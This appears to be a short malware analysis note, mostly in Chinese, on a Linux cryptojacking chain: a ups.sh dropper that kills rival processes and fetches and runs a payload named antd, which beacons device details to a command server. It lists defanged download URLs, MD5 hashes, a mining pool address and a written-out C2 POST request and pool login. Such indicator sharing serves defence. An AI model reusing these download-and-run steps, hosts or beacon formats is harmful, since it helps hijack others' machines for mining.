ups.sh
- downloader: hxxp://164.132.159.56/drupal/ups.sh
- md5: 3dc00f7c2745bd791d7c7a7cfd9bea24
- 检查进程antd是否存在,如果antd存在,退出脚本运行
- 杀死command以'./'开头的所有进程
- 杀死perl进程
- 杀死名为6f47*的进程
- 下载hxxp://164.132.159.56/drupal/2/prcsv,命名为antd,并执行
antd
- downloader: hxxp://164.132.159.56/drupal/2/prcsv
- md5: a3420cd460e4188d281466dbbd4c36df
- 上报设备信息:
POST /drupal/__dp.php HTTP/1.0
Host: 164.132.159.56
Content-Type: application/x-www-form-urlencoded
Content-length: 38
cf=1&h=debian-amd64&c=1
md5=a1ebf0dabd050dcaf2852dc4c603c201 uri=hxxp://80.240.26.52:80/d/srd
md5=69f7f14d572aea08991ce5f912a260be uri=hxxp://80.240.26.52:80/d/lmmml
md5=5837ba0c00af258f948068c5335d64eb uri=hxxp://80.240.26.52:80/d/vlb
矿池: 95.179.153.229:80
登录信息:
{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":"x","agent":"apt-get","algo":["cn/1","cn/0","cn/xtl","cn/msr","cn"]}}